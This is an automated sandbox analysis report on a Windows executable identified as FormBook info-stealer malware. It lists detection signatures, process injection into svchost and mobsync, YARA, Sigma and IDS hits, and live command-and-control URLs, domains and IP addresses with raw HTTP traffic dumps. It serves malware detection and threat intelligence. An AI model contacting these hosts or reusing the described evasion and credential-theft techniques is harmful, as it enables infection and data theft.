Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YH-3-12-2024-GDL Units - Projects.exe

Overview

General Information

Sample name:YH-3-12-2024-GDL Units - Projects.exe
Analysis ID:1567130
MD5:36e50660f18927eb838ce85dd46778c4
SHA1:2a81b0b315cf21f286d262a12ac0666145df7bac
SHA256:ec5bf8186eac9177d93bdf735449b9b4023631dcb3e67e1e5809dc22dbba842b
Tags:exeuser-mamrmu
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • YH-3-12-2024-GDL Units - Projects.exe (PID: 1068 cmdline: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe" MD5: 36E50660F18927EB838CE85DD46778C4)
    • svchost.exe (PID: 4076 cmdline: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • zZyhwwvEVl.exe (PID: 2924 cmdline: "C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 2188 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • zZyhwwvEVl.exe (PID: 792 cmdline: "C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1260 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", CommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", CommandLine|base64offset|contains: Rx, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", ParentImage: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe, ParentProcessId: 1068, ParentProcessName: YH-3-12-2024-GDL Units - Projects.exe, ProcessCommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", ProcessId: 4076, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", CommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", CommandLine|base64offset|contains: Rx, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", ParentImage: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe, ParentProcessId: 1068, ParentProcessName: YH-3-12-2024-GDL Units - Projects.exe, ProcessCommandLine: "C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exe", ProcessId: 4076, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T06:54:26.889952+010028563181A Network Trojan was detected192.168.2.449737134.0.14.15880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.aballanet.cat/6xrr/?rfJh=HxJAUmNG5a+243k4mB40tOImfLHqxfdDyQfNvKnIMmllTqWhJmPDYD6FfyD5P2YCiK6XZxIiPJwBP5cvXMaBQeeC+l9WsNh28r7y2sDNsg9aoK9FWK5iLU0=&O258-=pHdHBdXhwLOAvira URL Cloud: Label: malware
                Source: http://www.aballanet.cat/6xrr/Avira URL Cloud: Label: malware
                Source: http://aballanet.cat/6xrr/?rfJh=HxJAUmNG5aAvira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URL
                Source: logidant.xyzVirustotal: Detection: 11%Perma Link
                Multi AV Scanner detection for submitted file
                Source: YH-3-12-2024-GDL Units - Projects.exeReversingLabs: Detection: 31%
                Source: YH-3-12-2024-GDL Units - Projects.exeVirustotal: Detection: 33%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.1863712666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1867432570.0000000007C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3503391592.0000000004B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3503361317.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3502685707.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3502512945.0000000002E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1864625418.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: YH-3-12-2024-GDL Units - Projects.exeJoe Sandbox ML: detected
                Source: YH-3-12-2024-GDL Units - Projects.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000001.00000003.1832374212.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832385716.0000000003631000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832298452.000000000361B000.00000004.00000020.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000003.2216428550.000000000145B000.00000004.00000001.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3502936165.0000000001447000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zZyhwwvEVl.exe, 00000002.00000000.1787718772.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3502520360.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667390331.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666525007.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775542207.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1774016547.0000000003800000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1866702963.0000000004C2D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004F7E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1864869666.0000000004A78000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1667390331.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, YH-3-12-2024-GDL Units - Projects.exe, 00000000.00000003.1666525007.0000000003790000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1864235310.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1775542207.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1864235310.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1774016547.0000000003800000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000003.00000003.1866702963.0000000004C2D000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004F7E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000003.00000003.1864869666.0000000004A78000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503573132.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000001.00000003.1832374212.000000000361A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832385716.0000000003631000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1832298452.000000000361B000.00000004.00000020.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000003.2216428550.000000000145B000.00000004.00000001.00020000.00000000.sdmp, zZyhwwvEVl.exe, 00000002.00000002.3502936165.0000000001447000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503963835.000000000540C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2162666518.000000003836C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000003.00000002.3502781470.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000003.00000002.3503963835.000000000540C000.00000004.10000000.00040000.00000000.sdmp, zZyhwwvEVl.exe, 00000007.00000002.3503540308.000000000346C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2162666518.000000003836C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0082445A
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082C6D1 FindFirstFileW,FindClose,0_2_0082C6D1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0082C75C
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0082EF95
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0082F0F2
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0082F3F3
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_008237EF
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_00823B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00823B12
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_0082BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0082BCBC
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 3_2_02E9C560 FindFirstFileW,FindNextFileW,FindClose,3_2_02E9C560
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then xor eax, eax3_2_02E89D90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then mov ebx, 00000004h3_2_04C704EE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49737 -> 134.0.14.158:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.izmirescortg.xyz
                Source: DNS query: www.logidant.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox ViewIP Address: 45.141.156.114 45.141.156.114
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: YURTEH-ASUA YURTEH-ASUA
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\YH-3-12-2024-GDL Units - Projects.exeCode function: 0_2_008322EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_008322EE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 05:54:42 GMTserver: Apacheset-cookie: __tad=1733205282.4810970; expires=Fri, 01-Dec-2034 05:54:42 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 05:54:44 GMTserver: Apacheset-cookie: __tad=1733205284.6289982; expires=Fri, 01-Dec-2034 05:54:44 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Tue, 03 Dec 2024 05:54:47 GMTserver: Apacheset-cookie: __tad=1733205287.1341641; expires=Fri, 01-Dec-2034 05:54:47 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
